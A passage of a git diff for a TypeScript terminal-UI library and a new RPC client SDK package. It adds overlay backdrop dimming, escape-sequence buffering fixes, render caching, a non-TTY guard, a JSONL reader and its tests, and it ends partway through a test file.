// All base lines in viewport should contain dim escape (\x1b[2m) + // The overlay line itself is composited on top, but underlying lines get dimmed + const dimmedLine = result.find((l) => l.includes("second line")); + assert.ok(dimmedLine, "should have a line containing 'second line'"); + assert.ok(dimmedLine.includes("\x1b[2m"), "base line should be dimmed"); + }); + + it("backdrop uses gray foreground for dimming", () => { + const base = ["hello world", "second line"]; + const overlay = makeEntry(["OV"], { + width: 2, + anchor: "top-left", + backdrop: true, + }); + + const result = compositeOverlays(base, [overlay], 20, 20, 2); + + // Check a non-overlay line for backdrop codes (dim + gray fg, no bg) + const line = result.find((l) => l.includes("second line")); + assert.ok(line, "should have a line containing 'second line'"); + assert.ok(line.includes("\x1b[38;5;240m"), "backdrop should set gray foreground"); + assert.ok(!line.includes("\x1b[48;"), "backdrop should not set background color"); + }); + + it("does not dim when backdrop is false/absent", () => { + const base = ["hello world", "second line"]; + const overlay = makeEntry(["OVERLAY"], { + width: 7, + anchor: "top-left", + }); + + const result = compositeOverlays(base, [overlay], 20, 20, 2); + + // Lines not covered by overlay should remain undimmed + const secondLine = result.find((l) => l.includes("second line")); + assert.ok(secondLine, "should have a line containing 'second line'"); + assert.ok(!secondLine.includes("\x1b[2m"), "base line should not be dimmed"); + }); + + it("overlay content renders on top of dimmed background", () => { + const base = ["aaaaaaaaaa"]; + const overlay = makeEntry(["XX"], { + width: 2, + anchor: "top-left", + backdrop: true, + }); + + const result = compositeOverlays(base, [overlay], 10, 10, 1); + + // The first line should contain the overlay text + assert.ok(result[0].includes("XX"), "overlay text should be composited"); + }); +}); diff --git a/packages/pi-tui/src/__tests__/stdin-buffer.test.ts b/packages/pi-tui/src/__tests__/stdin-buffer.test.ts new file mode 100644 index 000000000..ba053567b --- /dev/null +++ b/packages/pi-tui/src/__tests__/stdin-buffer.test.ts @@ -0,0 +1,43 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; +import { setTimeout as delay } from "node:timers/promises"; + +import { StdinBuffer } from "../stdin-buffer.js"; + +describe("StdinBuffer", () => { + it("flushes a lone Escape keypress", async () => { + const buffer = new StdinBuffer({ timeout: 5 }); + const received: string[] = []; + buffer.on("data", (sequence) => received.push(sequence)); + + buffer.process("\x1b"); + await delay(20); + + assert.deepEqual(received, ["\x1b"]); + assert.equal(buffer.getBuffer(), ""); + }); + + it("keeps split CSI focus and mouse sequences buffered until completion", async () => { + const buffer = new StdinBuffer({ timeout: 5 }); + const received: string[] = []; + buffer.on("data", (sequence) => received.push(sequence)); + + buffer.process("\x1b["); + await delay(20); + assert.deepEqual(received, []); + assert.equal(buffer.getBuffer(), "\x1b["); + + buffer.process("I"); + assert.deepEqual(received, ["\x1b[I"]); + assert.equal(buffer.getBuffer(), ""); + + buffer.process("\x1b[<35;20;"); + await delay(20); + assert.deepEqual(received, ["\x1b[I"]); + assert.equal(buffer.getBuffer(), "\x1b[<35;20;"); + + buffer.process("5m"); + assert.deepEqual(received, ["\x1b[I", "\x1b[<35;20;5m"]); + assert.equal(buffer.getBuffer(), ""); + }); +}); diff --git a/packages/pi-tui/src/__tests__/tui.test.ts b/packages/pi-tui/src/__tests__/tui.test.ts new file mode 100644 index 000000000..7c4903dc7 --- /dev/null +++ b/packages/pi-tui/src/__tests__/tui.test.ts @@ -0,0 +1,50 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; + +import { TUI } from "../tui.js"; +import type { Terminal } from "../terminal.js"; + +function makeTerminal(): Terminal { + return { + isTTY: true, + columns: 80, + rows: 24, + kittyProtocolActive: false, + start() {}, + stop() {}, + drainInput: async () => {}, + write() {}, + moveBy() {}, + hideCursor() {}, + showCursor() {}, + clearLine() {}, + clearFromCursor() {}, + clearScreen() {}, + setTitle() {}, + }; +} + +describe("TUI", () => { + it("does not swallow a bare Escape keypress while waiting for the cell-size response", () => { + const tui = new TUI(makeTerminal()); + const received: string[] = []; + + tui.setFocus({ + render: () => [], + handleInput: (data: string) => { + received.push(data); + }, + invalidate() {}, + }); + + const anyTui = tui as any; + anyTui.cellSizeQueryPending = true; + anyTui.inputBuffer = ""; + + anyTui.handleInput("\x1b"); + + assert.deepEqual(received, ["\x1b"]); + assert.equal(anyTui.cellSizeQueryPending, false); + assert.equal(anyTui.inputBuffer, ""); + }); +}); diff --git a/packages/pi-tui/src/autocomplete.ts b/packages/pi-tui/src/autocomplete.ts index d0969921f..1ecd1e754 100644 --- a/packages/pi-tui/src/autocomplete.ts +++ b/packages/pi-tui/src/autocomplete.ts @@ -159,6 +159,7 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { ): { items: AutocompleteItem[]; prefix: string } | null { const currentLine = lines[cursorLine] || ""; const textBeforeCursor = currentLine.slice(0, cursorCol); + const trimmedBeforeCursor = textBeforeCursor.trimStart(); // Check for @ file reference (fuzzy search) - must be after a delimiter or at start const atPrefix = this.extractAtPrefix(textBeforeCursor); @@ -174,12 +175,12 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { } // Check for slash commands - if (textBeforeCursor.startsWith("/")) { - const spaceIndex = textBeforeCursor.indexOf(" "); + if (trimmedBeforeCursor.startsWith("/")) { + const spaceIndex = trimmedBeforeCursor.indexOf(" "); if (spaceIndex === -1) { // No space yet - complete command names with fuzzy matching - const prefix = textBeforeCursor.slice(1); // Remove the "/" + const prefix = trimmedBeforeCursor.slice(1); // Remove the "/" const commandItems = this.commands.map((cmd) => ({ name: "name" in cmd ? cmd.name : cmd.value, label: "name" in cmd ? cmd.name : cmd.label, @@ -196,12 +197,12 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { return { items: filtered, - prefix: textBeforeCursor, + prefix: `/${prefix}`, }; } else { // Space found - complete command arguments - const commandName = textBeforeCursor.slice(1, spaceIndex); // Command without "/" - const argumentText = textBeforeCursor.slice(spaceIndex + 1); // Text after space + const commandName = trimmedBeforeCursor.slice(1, spaceIndex); // Command without "/" + const argumentText = trimmedBeforeCursor.slice(spaceIndex + 1); // Text after space const command = this.commands.find((cmd) => { const name = "name" in cmd ? cmd.name : cmd.value; @@ -269,7 +270,8 @@ export class CombinedAutocompleteProvider implements AutocompleteProvider { // Check if we're completing a slash command (prefix starts with "/" but NOT a file path) // Slash commands are at the start of the line and don't contain path separators after the first / - const isSlashCommand = prefix.startsWith("/") && beforePrefix.trim() === "" && !prefix.slice(1).includes("/"); + const trimmedPrefix = prefix.trimStart(); + const isSlashCommand = trimmedPrefix.startsWith("/") && beforePrefix.trim() === "" && !trimmedPrefix.slice(1).includes("/"); if (isSlashCommand) { // This is a command name completion const newLine = `${beforePrefix}/${item.value} ${adjustedAfterCursor}`; diff --git a/packages/pi-tui/src/components/__tests__/editor.test.ts b/packages/pi-tui/src/components/__tests__/editor.test.ts new file mode 100644 index 000000000..057ed20da --- /dev/null +++ b/packages/pi-tui/src/components/__tests__/editor.test.ts @@ -0,0 +1,64 @@ +import assert from "node:assert/strict"; +import { describe, it } from "node:test"; + +import { Editor, type EditorTheme } from "../editor.js"; +import { CURSOR_MARKER, TUI } from "../../tui.js"; +import type { Terminal } from "../../terminal.js"; + +function makeTerminal(): Terminal { + return { + isTTY: true, + columns: 80, + rows: 24, + kittyProtocolActive: false, + start() {}, + stop() {}, + drainInput: async () => {}, + write() {}, + moveBy() {}, + hideCursor() {}, + showCursor() {}, + clearLine() {}, + clearFromCursor() {}, + clearScreen() {}, + setTitle() {}, + }; +} + +const theme: EditorTheme = { + borderColor: (text) => text, + selectList: { + selectedPrefix: (text) => text, + selectedText: (text) => text, + description: (text) => text, + scrollInfo: (text) => text, + noMatch: (text) => text, + }, +}; + +describe("Editor", () => { + it("clears bracketed paste state when focus is lost", () => { + const editor = new Editor(new TUI(makeTerminal()), theme); + editor.focused = true; + + editor.handleInput("\x1b[200~partial"); + editor.focused = false; + editor.focused = true; + editor.handleInput("hello"); + + assert.equal(editor.getText(), "hello"); + }); + + it("keeps the hardware cursor marker visible while autocomplete is open", () => { + const editor = new Editor(new TUI(makeTerminal()), theme); + editor.focused = true; + editor.setText("/se"); + + (editor as any).autocompleteState = "regular"; + (editor as any).autocompleteList = { render: () => [] }; + + const rendered = editor.render(40).join("\n"); + + assert.ok(rendered.includes(CURSOR_MARKER)); + }); +}); diff --git a/packages/pi-tui/src/components/box.ts b/packages/pi-tui/src/components/box.ts index c99b8600b..9dd692750 100644 --- a/packages/pi-tui/src/components/box.ts +++ b/packages/pi-tui/src/components/box.ts @@ -31,6 +31,16 @@ export class Box implements Component { this.invalidateCache(); } + insertChildBefore(component: Component, before: Component): void { + const index = this.children.indexOf(before); + if (index !== -1) { + this.children.splice(index, 0, component); + } else { + this.children.push(component); + } + this.invalidateCache(); + } + removeChild(component: Component): void { const index = this.children.indexOf(component); if (index !== -1) { diff --git a/packages/pi-tui/src/components/editor.ts b/packages/pi-tui/src/components/editor.ts index c9cefb83c..b370445c9 100644 --- a/packages/pi-tui/src/components/editor.ts +++ b/packages/pi-tui/src/components/editor.ts @@ -128,7 +128,17 @@ export class Editor implements Component, Focusable { }; /** Focusable interface - set by TUI when focus changes */ - focused: boolean = false; + private _focused: boolean = false; + get focused(): boolean { + return this._focused; + } + set focused(value: boolean) { + this._focused = value; + if (!value) { + this.isInPaste = false; + this.pasteBuffer = ""; + } + } protected tui: TUI; private theme: EditorTheme; @@ -376,8 +386,9 @@ export class Editor implements Component, Focusable { } // Render each visible layout line - // Emit hardware cursor marker only when focused and not showing autocomplete - const emitCursorMarker = this.focused && !this.autocompleteState; + // Keep the hardware cursor anchored while autocomplete is open so IME + // candidate windows still attach to the editor caret. + const emitCursorMarker = this.focused; for (const layoutLine of visibleLines) { let displayText = layoutLine.text; diff --git a/packages/pi-tui/src/components/image.test.ts b/packages/pi-tui/src/components/image.test.ts new file mode 100644 index 000000000..3bef04a85 --- /dev/null +++ b/packages/pi-tui/src/components/image.test.ts @@ -0,0 +1,36 @@ +/** + * Regression test for #3455: Image component must not trigger infinite + * re-render loop when dimensions resolve in cmux sessions. + */ + +import { describe, test } from "node:test"; +import assert from "node:assert/strict"; +import { Image } from "./image.js"; + +describe("Image component (#3455)", () => { + const theme = { fallbackColor: (s: string) => s }; + + test("getDimensions returns undefined before resolution", () => { + // Pass explicit dimensions to avoid async parsing + const img = new Image("base64data", "image/png", theme, {}); + // Without explicit dims, getDimensions should be undefined until async resolve + // But we can't easily test async here, so verify the method exists + assert.equal(typeof img.getDimensions, "function"); + }); + + test("getDimensions returns dimensions when provided at construction", () => { + const dims = { widthPx: 100, heightPx: 200 }; + const img = new Image("base64data", "image/png", theme, {}, dims); + const result = img.getDimensions(); + assert.deepEqual(result, dims, "Should return provided dimensions"); + }); + + test("onDimensionsResolved callback is not called when dimensions provided", () => { + let callCount = 0; + const dims = { widthPx: 100, heightPx: 200 }; + const img = new Image("base64data", "image/png", theme, {}, dims); + img.setOnDimensionsResolved(() => { callCount++; }); + // With pre-resolved dims, the async path is skipped entirely + assert.equal(callCount, 0, "Callback should not fire for pre-resolved dimensions"); + }); +}); diff --git a/packages/pi-tui/src/components/image.ts b/packages/pi-tui/src/components/image.ts index c789a0a5b..814167605 100644 --- a/packages/pi-tui/src/components/image.ts +++ b/packages/pi-tui/src/components/image.ts @@ -72,6 +72,11 @@ export class Image implements Component { return this.imageId; } + /** Get the resolved image dimensions (for caching across recreations). */ + getDimensions(): ImageDimensions | undefined { + return this.dimensionsResolved ? this.dimensions : undefined; + } + invalidate(): void { this.cachedLines = undefined; this.cachedWidth = undefined; diff --git a/packages/pi-tui/src/components/loader.ts b/packages/pi-tui/src/components/loader.ts index a55a2570c..5115f8337 100644 --- a/packages/pi-tui/src/components/loader.ts +++ b/packages/pi-tui/src/components/loader.ts @@ -2,13 +2,16 @@ import type { TUI } from "../tui.js"; import { Text } from "./text.js"; /** - * Loader component that updates every 80ms with spinning animation + * Loader component that updates every 80ms with spinning animation. + * Frame rotation is isolated from message text to avoid invalidating + * Text's render cache (wrapTextWithAnsi, visibleWidth) on every tick. */ export class Loader extends Text { private frames = ["⠋", "⠙", "⠹", "⠸", "⠼", "⠴", "⠦", "⠧", "⠇", "⠏"]; private currentFrame = 0; private intervalId: NodeJS.Timeout | null = null; private ui: TUI | null = null; + private _lastMessage: string = ""; constructor( ui: TUI, @@ -22,18 +25,38 @@ export class Loader extends Text { } render(width: number): string[] { - return ["", ...super.render(width)]; + // Only update Text content when message actually changes — + // frame rotation is prepended below without touching the cache + if (this.message !== this._lastMessage) { + this.setText(this.messageColorFn(this.message)); + this._lastMessage = this.message; + } + const messageLines = super.render(width); + // Shallow copy so we don't mutate cachedLines from Text + const result = ["", ...messageLines]; + // Prepend spinner frame to first content line + if (result.length > 1) { + const frame = this.frames[this.currentFrame]; + result[1] = this.spinnerColorFn(frame) + " " + result[1]; + } + return result; } start() { if (this.intervalId) { clearInterval(this.intervalId); } - this.updateDisplay(); + this.currentFrame = 0; this.intervalId = setInterval(() => { this.currentFrame = (this.currentFrame + 1) % this.frames.length; - this.updateDisplay(); + if (this.ui) { + this.ui.requestRender(); + } }, 80); + // Trigger initial render + if (this.ui) { + this.ui.requestRender(); + } } stop() { @@ -50,12 +73,6 @@ export class Loader extends Text { setMessage(message: string) { this.message = message; - this.updateDisplay(); - } - - private updateDisplay() { - const frame = this.frames[this.currentFrame]; - this.setText(`${this.spinnerColorFn(frame)} ${this.messageColorFn(this.message)}`); if (this.ui) { this.ui.requestRender(); } diff --git a/packages/pi-tui/src/components/text.ts b/packages/pi-tui/src/components/text.ts index efcf25b45..a9519bfdf 100644 --- a/packages/pi-tui/src/components/text.ts +++ b/packages/pi-tui/src/components/text.ts @@ -23,6 +23,7 @@ export class Text implements Component { } setText(text: string): void { + if (this.text === text) return; this.text = text; this.cachedText = undefined; this.cachedWidth = undefined; diff --git a/packages/pi-tui/src/overlay-layout.ts b/packages/pi-tui/src/overlay-layout.ts index 1896c5bba..5e306ec91 100644 --- a/packages/pi-tui/src/overlay-layout.ts +++ b/packages/pi-tui/src/overlay-layout.ts @@ -6,7 +6,7 @@ */ import type { OverlayAnchor, OverlayOptions, SizeValue } from "./tui.js"; -import { extractSegments, sliceByColumn, sliceWithWidth, truncateToWidth, visibleWidth } from "./utils.js"; +import { applyBackgroundToLine, extractSegments, sliceByColumn, sliceWithWidth, truncateToWidth, visibleWidth } from "./utils.js"; import { isImageLine } from "./terminal-image.js"; import { CURSOR_MARKER } from "./tui.js"; @@ -324,6 +324,18 @@ export function compositeOverlays( const viewportStart = Math.max(0, workingHeight - termHeight); + // Apply backdrop dimming if any visible overlay requests it. + // Uses dim + gray foreground so text fades without painting empty lines. + const hasBackdrop = visibleEntries.some((e) => e.options?.backdrop); + if (hasBackdrop) { + const dimFn = (text: string) => `\x1b[2m\x1b[38;5;240m${text}\x1b[39m\x1b[22m`; + for (let i = viewportStart; i < result.length; i++) { + if (!isImageLine(result[i]) && result[i].length > 0) { + result[i] = applyBackgroundToLine(result[i], termWidth, dimFn); + } + } + } + // Composite each overlay for (const { overlayLines, row, col, w } of rendered) { for (let i = 0; i < overlayLines.length; i++) { diff --git a/packages/pi-tui/src/stdin-buffer.ts b/packages/pi-tui/src/stdin-buffer.ts index 5b2f977b0..ea2baec91 100644 --- a/packages/pi-tui/src/stdin-buffer.ts +++ b/packages/pi-tui/src/stdin-buffer.ts @@ -361,6 +361,13 @@ export class StdinBuffer extends EventEmitter { return []; } + // Keep incomplete escape prefixes buffered so split CSI/mouse/focus + // sequences do not get emitted as literal text on timeout. + // A lone ESC is still flushed so an actual Escape keypress is not lost. + if (this.buffer.length > 1 && this.buffer.startsWith(ESC) && isCompleteSequence(this.buffer) === "incomplete") { + return []; + } + const sequences = [this.buffer]; this.buffer = ""; return sequences; diff --git a/packages/pi-tui/src/terminal.ts b/packages/pi-tui/src/terminal.ts index 52bb27ad3..ff84a6283 100644 --- a/packages/pi-tui/src/terminal.ts +++ b/packages/pi-tui/src/terminal.ts @@ -9,6 +9,9 @@ const cjsRequire = createRequire(import.meta.url); * Minimal terminal interface for TUI */ export interface Terminal { + // Whether stdout is a real TTY (false for pipes, e.g. RPC bridge processes) + readonly isTTY: boolean; + // Start the terminal with input and resize handlers start(onInput: (data: string) => void, onResize: () => void): void; @@ -63,11 +66,22 @@ export class ProcessTerminal implements Terminal { private stdinDataHandler?: (data: string) => void; private writeLogPath = process.env.PI_TUI_WRITE_LOG || ""; + get isTTY(): boolean { + return !!process.stdout.isTTY; + } + get kittyProtocolActive(): boolean { return this._kittyProtocolActive; } start(onInput: (data: string) => void, onResize: () => void): void { + // Non-TTY stdout (pipe) — skip TUI initialization entirely. + // RPC bridge processes communicate via JSON, not terminal escape codes. + // Without this guard, the render loop burns 500%+ CPU. (issue #3095) + if (!this.isTTY) { + return; + } + this.inputHandler = onInput; this.resizeHandler = onResize; diff --git a/packages/pi-tui/src/tui.ts b/packages/pi-tui/src/tui.ts index d0154b0ce..7c58c0145 100644 --- a/packages/pi-tui/src/tui.ts +++ b/packages/pi-tui/src/tui.ts @@ -141,6 +141,8 @@ export interface OverlayOptions { visible?: (termWidth: number, termHeight: number) => boolean; /** If true, don't capture keyboard focus when shown */ nonCapturing?: boolean; + /** If true, dim the background behind the overlay */ + backdrop?: boolean; } /** @@ -166,20 +168,33 @@ export interface OverlayHandle { */ export class Container implements Component { children: Component[] = []; + private _prevRender: string[] | null = null; addChild(component: Component): void { this.children.push(component); + this._prevRender = null; } removeChild(component: Component): void { const index = this.children.indexOf(component); if (index !== -1) { + const child = this.children[index]; this.children.splice(index, 1); + if ('dispose' in child && typeof (child as any).dispose === 'function') { + (child as any).dispose(); + } + this._prevRender = null; } } clear(): void { + for (const child of this.children) { + if ('dispose' in child && typeof (child as any).dispose === 'function') { + (child as any).dispose(); + } + } this.children = []; + this._prevRender = null; } invalidate(): void { @@ -194,6 +209,17 @@ export class Container implements Component { const rendered = child.render(width); for (let i = 0; i < rendered.length; i++) lines.push(rendered[i]); } + // Return stable reference if output unchanged — allows doRender() + // to skip ALL post-processing (isImageLine, applyLineResets, diffs) + const prev = this._prevRender; + if (prev && prev.length === lines.length) { + let same = true; + for (let i = 0; i < lines.length; i++) { + if (lines[i] !== prev[i]) { same = false; break; } + } + if (same) return prev; + } + this._prevRender = lines; return lines; } } @@ -222,6 +248,7 @@ export class TUI extends Container { private previousViewportTop = 0; // Track previous viewport top for resize-aware cursor moves private fullRedrawCount = 0; private stopped = false; + private _lastRenderedComponents: string[] | null = null; // Overlay stack for modal components rendered on top of base content private focusOrderCounter = 0; @@ -399,6 +426,12 @@ export class TUI extends Container { start(): void { this.stopped = false; + // Non-TTY stdout (pipe) — skip TUI entirely to avoid burning CPU. + // RPC bridge processes have piped stdio; rendering ANSI escape codes + // to a pipe is pure waste and causes a runaway render loop. (issue #3095) + if (!this.terminal.isTTY) { + return; + } this.terminal.start( (data) => this.handleInput(data), () => this.requestRender(), @@ -458,6 +491,8 @@ export class TUI extends Container { } requestRender(force = false): void { + // Skip rendering on non-TTY stdout to prevent CPU burn (issue #3095) + if (!this.terminal.isTTY) return; if (force) { this.previousLines = []; this.previousWidth = -1; // -1 triggers widthChanged, forcing a full clear @@ -555,6 +590,15 @@ export class TUI extends Container { this.cellSizeQueryPending = false; } + // Don't hold a bare Escape keypress hostage while waiting for the + // optional cell-size response. This is the most common early input race. + if (this.inputBuffer === "\x1b") { + const result = this.inputBuffer; + this.inputBuffer = ""; + this.cellSizeQueryPending = false; + return result; + } + // Check if we have a partial cell size response starting (wait for more data) // Patterns that could be incomplete cell size response: \x1b, \x1b[, \x1b[6, \x1b[6;...(no t yet) const partialCellSizePattern = /\x1b(\[6?;?[\d;]*)?$/; @@ -591,6 +635,13 @@ export class TUI extends Container { // Render all components to get new lines let newLines = this.render(width); + // Skip ALL post-processing if component output is unchanged. + // Container.render() returns the same array reference when stable. + if (newLines === this._lastRenderedComponents && this.overlayStack.length === 0) { + return; + } + this._lastRenderedComponents = newLines; + // Composite overlays into the rendered lines (before differential compare) if (this.overlayStack.length > 0) { newLines = compositeOverlays(newLines, this.overlayStack, width, height, this.maxLinesRendered); diff --git a/packages/rpc-client/.npmignore b/packages/rpc-client/.npmignore new file mode 100644 index 000000000..5aedf8f6e --- /dev/null +++ b/packages/rpc-client/.npmignore @@ -0,0 +1 @@ +dist/*.test.* diff --git a/packages/rpc-client/README.md b/packages/rpc-client/README.md new file mode 100644 index 000000000..6dcad70e6 --- /dev/null +++ b/packages/rpc-client/README.md @@ -0,0 +1,125 @@ +# @gsd-build/rpc-client + +Standalone RPC client SDK for GSD. Spawn the agent process, perform a v2 protocol handshake, send commands, and consume typed events via an async generator — all in a few lines of TypeScript. + +Zero internal dependencies. Ships its own inlined types. + +## Installation + +```bash +npm install @gsd-build/rpc-client +``` + +## Quick Start + +```typescript +import { RpcClient } from '@gsd-build/rpc-client'; + +const client = new RpcClient({ cwd: process.cwd() }); +await client.start(); +const { sessionId } = await client.init({ clientId: 'my-app' }); +console.log(`Session: ${sessionId}`); + +await client.prompt('Create a hello world script'); +for await (const event of client.events()) { + if (event.type === 'execution_complete') break; + console.log(event.type); +} +await client.shutdown(); +``` + +## API + +### Constructor + +```typescript +const client = new RpcClient(options?: RpcClientOptions); +``` + +| Option | Type | Description | +|------------|--------------------------|------------------------------------------| +| `cliPath` | `string` | Path to the CLI entry point | +| `cwd` | `string` | Working directory for the agent | +| `env` | `Record` | Environment variables | +| `provider` | `string` | AI provider (e.g. `"anthropic"`) | +| `model` | `string` | Model ID (e.g. `"claude-sonnet"`) | +| `args` | `string[]` | Additional CLI arguments | + +### Lifecycle + +| Method | Description | +|---------------|------------------------------------------------| +| `start()` | Spawn the agent process | +| `init(opts?)` | v2 handshake — returns `sessionId`, capabilities | +| `shutdown()` | Graceful shutdown | +| `stop()` | Force-kill the process | + +### Commands + +| Method | Description | +|--------------------------------|----------------------------------------| +| `prompt(message, images?)` | Send a prompt | +| `steer(message, images?)` | Interrupt with a steering message | +| `followUp(message, images?)` | Queue a follow-up message | +| `abort()` | Abort current operation | +| `subscribe(events)` | Subscribe to event types (`["*"]` for all) | + +### Events + +```typescript +// Async generator — recommended +for await (const event of client.events()) { + console.log(event.type); +} + +// Callback-based +const unsubscribe = client.onEvent((event) => { + console.log(event.type); +}); +``` + +### Helpers + +| Method | Description | +|---------------------------------------|------------------------------------------| +| `waitForIdle(timeout?)` | Wait for `agent_end` event | +| `collectEvents(timeout?)` | Collect events until idle | +| `promptAndWait(message, images?, t?)` | Send prompt and collect events | + +### Session & Model + +| Method | Description | +|----------------------------------|-----------------------------------| +| `getState()` | Get session state | +| `setModel(provider, modelId)` | Set model | +| `cycleModel()` | Cycle to next model | +| `getAvailableModels()` | List available models | +| `setThinkingLevel(level)` | Set thinking level | +| `cycleThinkingLevel()` | Cycle thinking level | +| `compact(instructions?)` | Compact session context | +| `getSessionStats()` | Get session statistics | +| `bash(command)` | Execute a bash command | +| `newSession(parent?)` | Start a new session | +| `sendUIResponse(id, response)` | Respond to extension UI requests | + +## Type Exports + +All protocol types are exported from the package root: + +```typescript +import type { + RpcCommand, + RpcResponse, + RpcInitResult, + RpcExecutionCompleteEvent, + RpcCostUpdateEvent, + RpcV2Event, + SessionStats, + SdkAgentEvent, + RpcClientOptions, +} from '@gsd-build/rpc-client'; +``` + +## License + +MIT diff --git a/packages/rpc-client/examples/basic-usage.ts b/packages/rpc-client/examples/basic-usage.ts new file mode 100644 index 000000000..3248799b4 --- /dev/null +++ b/packages/rpc-client/examples/basic-usage.ts @@ -0,0 +1,13 @@ +import { RpcClient } from '@gsd-build/rpc-client'; + +const client = new RpcClient({ cwd: process.cwd() }); +await client.start(); +const { sessionId } = await client.init({ clientId: 'my-app' }); +console.log(`Session: ${sessionId}`); + +await client.prompt('Create a hello world script'); +for await (const event of client.events()) { + if (event.type === 'execution_complete') break; + console.log(event.type); +} +await client.shutdown(); diff --git a/packages/rpc-client/package.json b/packages/rpc-client/package.json new file mode 100644 index 000000000..934be48ab --- /dev/null +++ b/packages/rpc-client/package.json @@ -0,0 +1,34 @@ +{ + "name": "@gsd-build/rpc-client", + "version": "2.52.0", + "description": "Standalone RPC client SDK for GSD — zero internal dependencies", + "license": "MIT", + "repository": { + "type": "git", + "url": "https://github.com/gsd-build/gsd-2.git", + "directory": "packages/rpc-client" + }, + "publishConfig": { + "access": "public" + }, + "type": "module", + "main": "./dist/index.js", + "types": "./dist/index.d.ts", + "exports": { + ".": { + "types": "./dist/index.d.ts", + "import": "./dist/index.js" + } + }, + "files": [ + "dist", + "!dist/**/*.test.*" + ], + "scripts": { + "build": "tsc -p tsconfig.json", + "test": "node --test dist/rpc-client.test.js" + }, + "engines": { + "node": ">=22.0.0" + } +} diff --git a/packages/rpc-client/src/index.ts b/packages/rpc-client/src/index.ts new file mode 100644 index 000000000..3771a3359 --- /dev/null +++ b/packages/rpc-client/src/index.ts @@ -0,0 +1,10 @@ +/** + * @gsd-build/rpc-client — standalone RPC client SDK for GSD. + * + * Re-exports all types, JSONL utilities, and the RpcClient class. + */ + +export * from "./rpc-types.js"; +export { serializeJsonLine, attachJsonlLineReader } from "./jsonl.js"; +export { RpcClient } from "./rpc-client.js"; +export type { RpcClientOptions, RpcEventListener, SdkAgentEvent } from "./rpc-client.js"; diff --git a/packages/rpc-client/src/jsonl.ts b/packages/rpc-client/src/jsonl.ts new file mode 100644 index 000000000..5392defef --- /dev/null +++ b/packages/rpc-client/src/jsonl.ts @@ -0,0 +1,64 @@ +import type { Readable } from "node:stream"; +import { StringDecoder } from "node:string_decoder"; + +/** + * Serialize a single strict JSONL record. + * + * Framing is LF-only. Payload strings may contain other Unicode separators such as + * U+2028 and U+2029. Clients must split records on `\n` only. + */ +export function serializeJsonLine(value: unknown): string { + return `${JSON.stringify(value)}\n`; +} + +/** + * Attach an LF-only JSONL reader to a stream. + * + * This intentionally does not use Node readline. Readline splits on additional + * Unicode separators that are valid inside JSON strings and therefore does not + * implement strict JSONL framing. + */ +export function attachJsonlLineReader(stream: Readable, onLine: (line: string) => void): () => void { + const decoder = new StringDecoder("utf8"); + let buffer = ""; + + const emitLine = (line: string) => { + onLine(line.endsWith("\r") ? line.slice(0, -1) : line); + }; + + const onData = (chunk: string | Buffer) => { + buffer += typeof chunk === "string" ? chunk : decoder.write(chunk); + + while (true) { + const newlineIndex = buffer.indexOf("\n"); + if (newlineIndex === -1) { + return; + } + + emitLine(buffer.slice(0, newlineIndex)); + buffer = buffer.slice(newlineIndex + 1); + } + }; + + const onEnd = () => { + buffer += decoder.end(); + if (buffer.length > 0) { + emitLine(buffer); + buffer = ""; + } + }; + + const onError = (_err: Error) => { + // Stream errors are non-fatal for JSONL reading + }; + + stream.on("data", onData); + stream.on("end", onEnd); + stream.on("error", onError); + + return () => { + stream.off("data", onData); + stream.off("end", onEnd); + stream.off("error", onError); + }; +} diff --git a/packages/rpc-client/src/rpc-client.test.ts b/packages/rpc-client/src/rpc-client.test.ts new file mode 100644 index 000000000..9fcb7874f --- /dev/null +++ b/packages/rpc-client/src/rpc-client.test.ts @@ -0,0 +1,568 @@ +import { describe, it, beforeEach, afterEach } from "node:test"; +import assert from "node:assert/strict"; +import { PassThrough } from "node:stream"; +import { serializeJsonLine, attachJsonlLineReader } from "./jsonl.js"; +import type { + RpcInitResult, + RpcExecutionCompleteEvent, + RpcCostUpdateEvent, + RpcProtocolVersion, + SessionStats, + RpcV2Event, +} from "./rpc-types.js"; +import { RpcClient } from "./rpc-client.js"; +import type { SdkAgentEvent } from "./rpc-client.js"; + +// ============================================================================ +// JSONL Tests +// ============================================================================ + +describe("serializeJsonLine", () => { + it("produces valid JSON terminated with LF", () => { + const result = serializeJsonLine({ type: "test", value: 42 }); + assert.ok(result.endsWith("\n"), "must end with LF"); + const parsed = JSON.parse(result.trim()); + assert.equal(parsed.type, "test"); + assert.equal(parsed.value, 42); + }); + + it("serializes strings with special characters", () => { + const result = serializeJsonLine({ msg: "hello\nworld" }); + assert.ok(result.endsWith("\n")); + // The embedded \n must be escaped inside the JSON — only the trailing LF is the framing delimiter + const lines = result.split("\n"); + // Should be exactly 2 parts: the JSON line and the empty string after trailing LF + assert.equal(lines.length, 2); + assert.equal(lines[1], ""); + const parsed = JSON.parse(lines[0]); + assert.equal(parsed.msg, "hello\nworld"); + }); + + it("handles empty objects", () => { + const result = serializeJsonLine({}); + assert.equal(result, "{}\n"); + }); +}); + +describe("attachJsonlLineReader", () => { + it("splits on LF correctly", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + stream.write('{"a":1}\n{"b":2}\n'); + stream.end(); + + // Let microtask queue flush + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 2); + assert.equal(JSON.parse(lines[0]).a, 1); + assert.equal(JSON.parse(lines[1]).b, 2); + }); + + it("handles chunked data across boundaries", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + // Write in fragments that split mid-line + stream.write('{"type":"hel'); + stream.write('lo"}\n{"type":"w'); + stream.write('orld"}\n'); + stream.end(); + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 2); + assert.equal(JSON.parse(lines[0]).type, "hello"); + assert.equal(JSON.parse(lines[1]).type, "world"); + }); + + it("emits trailing data on stream end", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + attachJsonlLineReader(stream, (line) => lines.push(line)); + + stream.write('{"final":true}'); + stream.end(); + + await new Promise((r) => setTimeout(r, 10)); + + assert.equal(lines.length, 1); + assert.equal(JSON.parse(lines[0]).final, true); + }); + + it("returns a detach function that stops reading", async () => { + const stream = new PassThrough(); + const lines: string[] = []; + + const detach = attachJsonlLineReader(stream, (line) => lines.push(line)); + + 